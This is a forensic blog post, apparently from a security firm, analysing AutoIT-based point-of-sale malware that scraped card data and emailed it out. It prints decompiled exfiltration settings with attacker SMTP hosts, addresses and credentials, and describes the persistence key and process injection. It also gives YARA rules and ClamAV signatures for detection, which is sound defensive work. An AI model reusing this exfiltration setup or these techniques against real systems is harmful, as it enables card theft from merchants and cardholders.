Skip to main content

AutoIT Scripting in POS Malware

March 17, 2014

Over the past few years, using AutoIT scripting language to create and install malware has become more prevalent.12 This trend has made its way into the POS environment as well. In three of my recent PFIs (PCI Forensic Investigations), I've come across POS malware that uses AutoIT scripting.

On two of the PFIs, the AutoIT script was named 'wow32.exe' with file sizes of 386,189 and 386,183 bytes. The third used a script named ‘cbs.exe.exe’ with a file size of 385,312 bytes.

Let’s take a look at how attackers used these scripts to compromise the environment and obtain cardholder data.

First, the attacker creates a registry key that launches the script whenever a user logs in, which means it's basically a startup program.

+ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - Name : systemupdater - Value : C:\WINDOWS\system32\1025\wow32.exe CCS.exe

'CCS.exe' is a POS server process, so the malware isn't restricted to any particular payment application software.

'wow2.exe' calls 'winhttp.exe' ('sr.exe' on the 3rd PFI), which injects a third piece of malware ('Searcher.dll') into the POS process and does the actual scraping CHD and data tracking. It then writes it to a file with file name format '%s%i_%s_%i.log' (example: '5776_CCS.exe_66789.log') in 'C:\WINDOWS\system32\'.

Back to 'wow32.exe'. It uses a legitimate Microsoft library 'cdosys.dll' - which the attacker bundles with the other malware pieces - to exfiltrate the captured data via email attachments using the parameters specified in the AutoIT script.4

I used one of the many UPX unpackers on the 'wow32.exe' and 'cbs.exe.exe' executables. Next, I used a very excellent open source tool, ‘myAutToExe.exe’,5 to decompile them and compare about 4,800 lines of AutoIT source code using the built-in Windows file compare tool, 'fc.exe'.

Here are the differences:

***** WOW32-DECOMPILE1.AU3 $PRG = "winhttp.exe" $INTERVAL = 12 $SMTPSERVER = "67.23.166.11" $FROMNAME = "HaHaHa ProductionN" $FROMADDRESS = "hahaha@production.com" $TOADDRESS = "altelenoi2012@yahoo.com" $SUBJECT = @ComputerName & " - " & @IPAddress1 $BODY = @IPAddress1 & " - " & @IPAddress2 $CCADDRESS = "" ***** wow32-decompile2.au3 $PRG = "winhttp.exe" $INTERVAL = 12 $SMTPSERVER = "67.23.166.11" $FROMNAME = "HaHaHa Production" $FROMADDRESS = "hahaha@production.com" $TOADDRESS = "bugs1122@yahoo.com" $SUBJECT = @ComputerName & " - " & @IPAddress1 $BODY = @IPAddress1 & " - " & @IPAddress2 $CCADDRESS = "" ***** cbs.exe-decompile.au3 $PRG = "sr.exe" $INTERVAL = 12 $SMTPSERVER = "mail.boston-bob.eu" $FROMNAME = "Messi" $FROMADDRESS = "john@balboa.us" $TOADDRESS = "paris.paris2244@yahoo.com" $SUBJECT = @ComputerName $BODY = @IPAddress1 & "-" & @IPAddress1 $CCADDRESS = "" ***** ***** WOW32-DECOMPILE1.AU3 $BCCADDRESS = "" $USERNAME = "websend02@safe-deals.biz" $PASSWORD = "rWRCRoyDGf1J" $IPPORT = 25 ***** wow32-decompile2.AU3 $BCCADDRESS = "" $USERNAME = "websend02@safe-deals.biz" $PASSWORD = "rWRCRoyDGf1J" $IPPORT = 25 ***** cbs.exe-decompile.au3 $BCCADDRESS = "" $USERNAME = "bob@boston-bob.eu" $PASSWORD = "B$Gs&yH9HytZ" $IPPORT = 25 *****

Normally in a PFI for Level 3 and 4 merchants, there's no evidence of exfiltration because firewall logs and network traffic capture aren't available. But I got lucky. In 'pagefile.sys' I found an email with six attachments and 30 PANs with track data ('X' is used to mask sensitive data):

Ac8Ot5czDGFoz6MMRECUfYTSP0/OQg== Thread-Topic: XXXXXXXXXX - 192.168.xxx.xx From: "HaHaHa ProductionN" To: Subject: XXXXXXXXXX - 192.168.xxx.xxx Date: Sat, 11 Jan 2014 02:26:29 -0800 Message-ID: <040531DAC0B84353AF4547B312107D3B@XXXXXXXXXX> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0219_01CF0E74.89105D60" X-Mailer: Microsoft CDO for Windows 2000 Content-Class: urn:content-classes:message Importance: Normal Priority: normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4913 This is a multi-part message in MIME format. ------=_NextPart_000_0219_01CF0E74.89105D60 Content-Type: text/plain Content-Transfer-Encoding: 7bit 192.168.xxx.xx - 192.168.xx.xxx CCS.exe was closed. C:\WINDOWS\system32\1628_CCS.exe_86632.log.tmp:231:4342562158492478= 16021010000000175 C:\WINDOWS\system32\5596_CCS.exe_96690.log.tmp:0: ------=_NextPart_000_0219_01CF0E74.89105D60 Content-Type: application/octet-stream; name="1628_CCS.exe_86632.log.tmp" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="1628_CCS.exe_86632.log.tmp" 434256xxxxxx2478=1602101xxxxxxxxxx 421764xxxxxx1907=1512101xxxxxxxxxxxxx 483316xxxxxx7360=1604101xxxxxxxxxxxxx 428208xxxxxx2685=1609101xxxxxxxxxxxxx 428208xxxxxx5519=1411101xxxxxxxxxxxxx 371242xxxxxx3004=1706101xxxxxxxxxxxxxx [rest of email truncated]

I wrote Yara rules for the set of malware using unique keywords, and sure enough, I found evidence - using Volatility on the POS server memory dump - that ‘Searcher.dll’ was indeed injected into the POS process ‘CCS.exe’.

../../volatility-2.3.1/vol.py --profile=Win2003SP2x86 -f ./memdump.mem yarascan --yara-file=../yara/rules-PFI-malware.yara Rule: Searcher_dll Owner: Process CCS.exe Pid 3704 0x7c55a1dc 45 6e 63 6f 64 65 50 6f 69 6e 74 65 72 00 00 00 EncodePointer... 0x7c55a1ec 4b 00 45 00 52 00 4e 00 45 00 4c 00 33 00 32 00 K.E.R.N.E.L.3.2. 0x7c55a1fc 2e 00 44 00 4c 00 4c 00 00 00 00 00 44 65 63 6f ..D.L.L.....Deco 0x7c55a20c 64 65 50 6f 69 6e 74 65 72 00 00 00 46 6c 73 46 dePointer...FlsF Rule: Searcher_dll Owner: Process CCS.exe Pid 3704 0x7c55b32c 43 4f 4e 4f 55 54 24 00 53 75 6e 4d 6f 6e 54 75 CONOUT$.SunMonTu 0x7c55b33c 65 57 65 64 54 68 75 46 72 69 53 61 74 00 00 00 eWedThuFriSat... 0x7c55b34c 4a 61 6e 46 65 62 4d 61 72 41 70 72 4d 61 79 4a JanFebMarAprMayJ 0x7c55b35c 75 6e 4a 75 6c 41 75 67 53 65 70 4f 63 74 4e 6f unJulAugSepOctNo Rule: Searcher_dll Owner: Process CCS.exe Pid 3704 0x7c55b37c 25 73 25 69 5f 25 73 5f 25 69 2e 6c 6f 67 00 00 %s%i_%s_%i.log.. 0x7c55b38c 00 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00 ....H........... 0x7c55b39c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x7c55b3ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

I wrote some ClamAV signatures to detect the malware set using the ClamAV ‘sigtool’.

For the pieces that have the same MD5 hash, these go in an *.hdb signature file (MD5 hash, file size, file name).

85fd14b070f47f0c27aed18359fdd2ad:2067968:cdosys.dll eb53db9ccf7ba39750e797ebf48bbdef:55296:winhttp.exe 0d54107cb2a79550c349ababc28c71cb:55808:Searcher.dll

The Yara rules for use in Volatility were written based on unique keywords:

rule wow32_exe { meta: description = "wow32-exe" thread_level = 3 in_the_wild = true strings: $a = "avsupport@autoitscript.com" wide ascii $b = "compiled AutoIt script" wide ascii condition: $a and $b } rule cdosys_dll { meta: description = "cdosys-dll" thread_level = 3 in_the_wild = true strings: $a = "Microsoft CDO for Windows Library" wide ascii $b = "CDOSYS.DLL" wide ascii condition: $a and $b } rule winhttp_exe { meta: description = "winhttp-exe" thread_level = 3 in_the_wild = true strings: $a = "SeDebugPrivilege" wide ascii $b = "SearchInject" wide ascii $c = "Searcher.dll" wide ascii condition: $a and $b and $c } rule Searcher_dll { meta: description = "Searcher-dll" thread_level = 3 in_the_wild = true strings: $a = "EncodePointer" wide ascii $b = "CONOUT$" wide ascii $c = "%s%i_%s_%i.log" wide ascii condition: $a and $b and $c }

I used the same unique keywords to write ClamAV signatures. Note: Each signature should be on one line.

wow32-exe;Target:0;(0&1); 6176737570706f7274406175746f69747363726970742e636f6d; 636f6d70696c6564204175746f497420736372697074 cdosys-dll;Target:0;(0&1); 4d6963726f736f66742043444f20666f722057696e646f7773204c696272617279; 43444f5359532e444c4c winhttp-exe;Target:0;(0&1&2); 5365446562756750726976696c656765;536561726368496e6a656374; 53656172636865722e646c6c Searcher-dll;Target:0;(0&1&2); 456e636f6465506f696e746572;434f4e4f555424; 257325695f25735f25692e6c6f67

For 'wow32.exe', keep in mind that ClamAV will unpack UPX files then run signatures against the unpacked file, but it will not automatically decompile the AutoIT script.

References:

1. Autoit Malware Revisited

2. Autoit Used to Spread Malware and Toolsets/

4. Microsoft Support

5. Deioncube

Related Blogs

January 18, 2012

Fingerprints … Why? I Have Your Printer Drivers!

For the purposes of clarification herein, “analysis profile” is a structure of evidence that is combined in such a fashion as to support or refute the...

See Details

January 08, 2014

What Lurks in Your Network? Finding & Combating Undetected Malware

For the past 19 months, I have been in charge of the Incident Management (IM) team for FishNet Security, handling digital investigations and proactive...

See Details

January 25, 2017

Escape and Evasion Egressing Restricted Networks

A command kill chain consists of payload delivery, code execution on a target system, and establishing a command and control (C2) channel outside of a...

See Details

How Can We Help?

Let us know what you need, and we will have an Optiv professional contact you shortly.


Privacy Policy

Related Insights

February 23, 2015

The Diminishing Efficacy of Network Security | Optiv

I am an old-school network security guy, and it pains me to see the rapid decline of network security solutions due to the advancement of detection ev...

See Details

May 10, 2017

PCI Compliance Every Day

The title of this post sounds daunting, does it not? However, achieving PCI compliance every day is not as daunting as you might think. With the relea...

See Details

June 14, 2017

Incident Management Plan Development

We have the experience and knowledge required to help your organization develop a strong incident management plan.

See Details

Stay in the Know

For all the latest cybersecurity and Optiv news, subscribe to our blog and connect with us on Social.

Subscribe

Join our Email List

We take your privacy seriously and promise never to share your email with anyone.

Stay Connected

Find cyber security Events in your area.